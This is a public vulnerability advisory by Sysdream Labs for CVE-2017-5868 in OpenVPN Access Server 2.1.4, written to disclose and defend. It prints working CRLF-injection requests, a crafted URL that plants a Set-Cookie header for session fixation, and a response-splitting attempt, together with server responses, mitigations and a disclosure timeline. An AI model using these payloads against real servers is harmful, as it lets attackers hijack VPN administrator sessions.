OpenVPN Access Server 2.1.4 CRLF Injection

`# OpenVPN Access Server : CRLF injection with Session fixation  
  
## Description  
  
OpenVPN Access Server is a full featured secure network tunneling VPN  
software solution that integrates OpenVPN server capabilities,  
enterprise management capabilities, simplified OpenVPN Connect UI, and  
OpenVPN Client software packages that accommodate Windows, MAC, Linux,  
Android, and iOS environments. OpenVPN Access Server supports a wide  
range of configurations, including secure and granular remote access to  
internal network and/ or private cloud network resources and  
applications with fine-grained access control.  
  
## CRLF injection + Session fixation  
  
OpenVPN-AS (Version 2.1.4) is prone to CRLF injection.  
Using the character %0A, it is possible to inject headers and content.  
  
Furthermore, this vulnerability allow us to exploit a session fixation  
attack.  
Indeed, during the authentication the session cookie is poorly handled.  
  
We have not been able to exploit it but the application may be prone to  
HTTP Response Splitting attacks.  
  
**Threat**  
  
Exploiting these vulnerabilities, we were able to steal a session from a  
victim and then access the application (OpenVPN-AS) with his rights.  
  
Exploiting this on an administrator account may lead to serious  
consequences.  
  
**CVE ID**: CVE-2017-5868  
  
**Access Vector**: network  
  
**Security Risk**: medium  
  
**Vulnerability**: CWE-113, CWE-93, CWE-384  
  
**CVSS Base Score**: 5.3 (Medium)  
  
**CVSS Vector**: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L  
  
### CRLF injection  
  
It is possible to inject a CRLF character like `%0A` using the URL :  
<https://www.mysite.com/__session_start__/>  
  
```  
GET /__session_start__/%0atest HTTP/1.1  
Host: www.mysite.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Connection: close  
Cookie: openvpn_sess_******=******dc61  
Pragma: no-cache  
Cache-Control: no-cache  
```  
  
As a result, we obtained this response from the server :  
  
```  
HTTP/1.1 302 Found  
Date: Wed, 18 Jan 2017 10:19:46 GMT  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Location: https://www.mysite.com/  
test  
Server: OpenVPN-AS  
  
<html>  
<body>  
<p>REDIRECT</p>  
</body>  
</html>  
```  
  
Thus, the `%0A` character is taken into account and we can clearly see  
the test string at an unexpected location.  
  
### Using a CRLF injection in order to do a session fixation attack  
  
Using the CRLF injection and a problem during the authentication phase  
(the session cookie is not re-generated), we were able to successfully  
exploit a session fixation vulnerability.  
  
In order to exploit this vulnerability, we followed the steps below :  
  
1. As the victim, access the OpenVPN-AS application in order to obtain a  
valid session cookie (at this point, the victim is not authenticated).  
2. Sent a malicious URL to the victim in order to set his session cookie.  
  
As an example, we aim to inject a Set-Cookie header with a known value :  
  
```  
https://www.mysite.com/__session_start__/%0aSet-Cookie:  
openvpn_sess_******=******cf23; Path=/; Secure; HttpOnly  
```  
  
This URL will allow the attacker to choose the value of the session  
cookie of the victim.  
  
3. At this point, the victim needs to authenticate itself. His profile  
(and rights) will then be associated with the session cookie controlled  
by the attacker.  
4. Finally, as the attacker, we can access the OpenVPN-AS application  
with the rights of the victim (using the session cookie).  
  
### Tries for an HTTP Response Splitting attack  
  
We also tried to exploit an HTTP Response Splitting attack without  
success, for now.  
  
```  
GET  
/__session_start__/%0aSet-Cookie:%20openvpn_sess_******=******ac42;%20Path=/%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length:%2017%0a%0a<html>TEST</html>  
HTTP/1.1  
Host: www.mysite.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Connection: close  
Cookie: openvpn_sess_******=******dc61  
Pragma: no-cache  
Cache-Control: no-cache  
```  
  
As we can see, it is possible to use multiple times the character %0A,  
in order to forge another response.  
  
```  
HTTP/1.1 302 Found  
Date: Wed, 18 Jan 2017 10:29:23 GMT  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Location: https://www.mysite.com/  
Set-Cookie: openvpn_sess_******=******ac42; Path=/  
Content-Length: 0  
  
Content-Length: 171  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Content-Length: 17  
  
<html>TEST</html>  
Server: OpenVPN-AS  
  
3b  
  
<html>  
<body>  
<p>REDIRECT</p>  
</body>  
</html>  
  
0  
```  
  
### Solution  
  
The vendor didn't provided a patch for this vulnerability. However,  
several solutions can be taken :  
  
* Use a Reverse Proxy in order to restrict CRLF characters in URI.  
* Restrict access to the web interface (for instance, IP whitelisting).  
  
From the vendor side, several steps need to be taken:  
  
* CRLF characters must be escaped  
* Session cookie must be re-generated during the authentication  
  
## Timeline (dd/mm/yyyy)  
  
* 18/01/2017 : Initial discovery.  
* 06/02/2017 : First contact with OpenVPN Security team.  
* 13/02/2017 : OpenVPN Team request to file a ticket on the Access  
Server support system. (#IFX-370-42406)  
* 17/02/2017 : Reply from the owner, acknowledging the vulnerability and  
planning to fix the vulnerabilities.  
* 29/03/2017 : Sysdream Labs request for an ETA, warning for public  
disclosure.  
* 21/04/2017 : New request for feedback.  
* 04/05/2017 : Another and last attempt.  
* 23/05/2017 : Public disclosure.  
  
## Credits  
  
* Julien Boulet, Sysdream (j.boulet -at- sysdream -dot- com)  
  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`